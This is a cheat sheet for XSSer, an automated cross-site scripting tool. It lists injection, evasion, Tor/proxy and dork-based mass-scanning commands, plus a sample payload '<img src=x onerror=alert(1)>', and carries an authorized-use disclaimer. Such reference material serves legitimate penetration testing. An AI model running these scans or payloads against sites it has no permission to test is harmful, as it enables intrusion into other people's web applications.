← All cheat sheets

XSSER

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

XSSer (Cross Site Scripter) is an automatic framework for detecting,
exploiting, and reporting XSS vulnerabilities in web applications.
It provides multiple injection techniques and evasion methods.

BASIC USAGE#

xsser -u <url>                   # Auto scan for XSS
xsser --url <url>                # Scan target URL
xsser -g                         # Launch GUI (GTK)

INJECTION MODES#

xsser -u <url> --auto            # Automatic injection testing
xsser -u <url> --Xsa             # XSS via User-Agent header
xsser -u <url> --Xsr             # XSS via Referer header
xsser -u <url> --Xsc             # XSS via Cookie header
xsser -u <url> --XsD             # XSS via DOM injection
xsser -u <url> --Coo             # Cookie injection
xsser -u <url> --Doo             # DOM-based testing

TARGET OPTIONS#

xsser -u <url>                   # Single URL
xsser -i <file>                  # URLs from file
xsser -d <dork>                  # Search engine dorking
xsser --De <dork_engine>         # Dork search engine (google, bing)
xsser -l <crawl_depth>           # Crawl depth

# URL parameter marking:
xsser -u "http://target.com/page?param=XSS"
                                 # XSS marks injection point

PAYLOAD OPTIONS#

xsser -u <url> --payload <script>
                                 # Custom XSS payload
xsser -u <url> --Fr <payload>    # Custom final payload
xsser -u <url> --Fp <payload>    # Custom fuzzing payload

ENCODING / EVASION#

xsser -u <url> --Cem <method>    # Character encoding method
xsser -u <url> --Str             # Use string.fromCharCode()
xsser -u <url> --Une             # URL encoding
xsser -u <url> --Dwo             # Double URL encoding
xsser -u <url> --Hex             # Hexadecimal encoding
xsser -u <url> --Hes             # Hex entities (semicolons)
xsser -u <url> --Tled            # Use alert to confirm
xsser -u <url> --Sfi             # Substitute & filter
xsser -u <url> --Ank             # Anchor tag injection
xsser -u <url> --Dcp             # Data Control Protocol

TECHNIQUE OPTIONS#

xsser -u <url> --Coo             # Cookie injection
xsser -u <url> --Xsa             # User-Agent injection
xsser -u <url> --Xsr             # Referer injection
xsser -u <url> --Xsc             # Cookie injection
xsser -u <url> --XsD             # DOM injection

PROXY & NETWORK#

xsser -u <url> --proxy <proxy>   # Use HTTP proxy
xsser -u <url> --tor             # Use Tor network
xsser -u <url> --timeout <secs>  # Request timeout
xsser -u <url> --threads <n>     # Concurrent threads
xsser -u <url> --delay <secs>    # Delay between requests
xsser -u <url> --user-agent <ua> # Custom User-Agent
xsser -u <url> --cookie <cookie> # Set cookies
xsser -u <url> --auth-cred <u:p> # Basic authentication

OUTPUT OPTIONS#

xsser -u <url> --save             # Save results
xsser -u <url> --xml <file>       # XML output
xsser -u <url> -v                 # Verbose output
xsser -u <url> --no-head          # Skip HEAD requests
xsser -u <url> --reverse-check    # Verify XSS with reverse connection

EXAMPLES#

# Automatic XSS scan
xsser -u "http://target.com/search?q=XSS" --auto

# Scan with WAF evasion (encoding)
xsser -u "http://target.com/page?id=XSS" --Hex --Str

# DOM-based XSS testing
xsser -u "http://target.com/page" --XsD

# Header injection testing
xsser -u "http://target.com/" --Xsa --Xsr

# Custom payload
xsser -u "http://target.com/page?q=XSS" --payload "<img src=x onerror=alert(1)>"

# Dork-based mass scanning
xsser -d "inurl:search.php?q=" --De google

# Scan through proxy with encoding
xsser -u "http://target.com/?q=XSS" --proxy http://127.0.0.1:8080 --Une --Hex

# Save results as XML
xsser -u "http://target.com/?q=XSS" --auto --xml results.xml

NOTES#

- Python-based tool
- GUI and CLI modes available
- Multiple encoding/evasion techniques
- Supports reflected, stored, and DOM XSS
- Google dorking for target discovery
- Can verify XSS via reverse connections
- Pair with Burp Suite for manual verification
- May produce false positives - verify manually
- Actively maintained